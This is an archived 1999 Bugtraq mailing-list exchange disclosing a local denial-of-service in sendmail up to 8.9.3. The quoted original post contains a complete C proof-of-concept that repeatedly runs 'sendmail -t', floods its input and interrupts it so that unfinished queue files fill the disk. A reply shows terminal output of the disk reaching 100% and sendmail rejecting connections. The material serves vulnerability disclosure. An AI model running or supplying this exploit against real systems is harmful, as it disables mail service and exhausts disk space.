Well, this is very interesting... this is what I found my running this binary for 30 seconds =) Before: # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 87681 199909 30% / # ps auwx | grep sendmail root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: accepting connections on port 25 # ls -l /var/spool/mqueue total 0 # After (30 seconds running): # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 107548 180042 37% / (not too bad but another 30 seconds later another df) Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 146235 141355 51% / # ps auwx | grep sendmail mail 17144 70.5 0.4 1348 820 p1 R 11:35 0:48 /usr/sbin/sendmail -t root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: accepting connections on port 25 (sendmail kindly using 70% of my CPU) # ls -l /var/spool/mqueue total 115854 -rw------- 1 mail mail 118169600 Apr 1 11:37 dfLAA17144 -rw------- 1 mail mail 0 Apr 1 11:35 qfLAA17144 -rw------- 1 mail mail 0 Apr 1 11:35 xfLAA17144 (once again a df) # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 224734 62856 78% / and once the hard drive becomes filled sendmail stops accepting connections since it has no temp space. # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 287590 0 100% / # ps auwx | grep sendmail mail 17144 68.5 0.4 1348 820 p1 R 11:35 2:33 /usr/wrapped/sendmail -t root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: rejecting connections on port 25: min free: 100 # People, this is no april fools joke =) Raymond T Sundland MCSE, MCP, MCP+Internet PGP Key: finger pgpat_private |-----Original Message----- |From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of Lukasz |Luzar |Sent: Thursday, April 01, 1999 9:00 AM |To: BUGTRAQat_private |Subject: Possible local DoS in sendmail | | |Hi, |It seems that sendmail ran with -t option does NOT block SIGINT ... |In that moment while we are sending data to its stdin, when we will press |CTRL-C process is being killed, but in queue rests unfinished letter. |It stays there quite long - long enought to fullfill partition on |disk where |/var/spool/mqueue resides. |When it happends, sendmail doesn't allow new connections - so it is a kind |of DoS attack for this service. |It has been tested on all new versions on sendmail up to current (8.9.3). | |Example ... | | --- CUT HERE ---- | #include <stdio.h> | #include <unistd.h> | #include <signal.h> | #include <sys/wait.h> | | #define DELAY 5 /* time in seconds needed to reach | MaxMessageSize limit */ | #define SM_PATH "/usr/sbin/sendmail -t" | | void main() | { | FILE *fd; | int pid; | | for(;;) { | if(( pid = fork()) == 0) { | setpgrp(); | if(( fd = popen( SM_PATH, "w")) == NULL) | fprintf( stderr, "popen error\n"); | | for(;;) fputc( 'A', fd); | } else { | sleep( DELAY); | kill( (-1) * pid, SIGINT); | fprintf( stdout, "next\n"); | wait( NULL); | } | } | } |--- CUT HERE --- | |Regards, | |--- |Lukasz Luzar K.K.I. |http://noname.kki.krakow.pl/ lluzarat_private |
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:19 PDT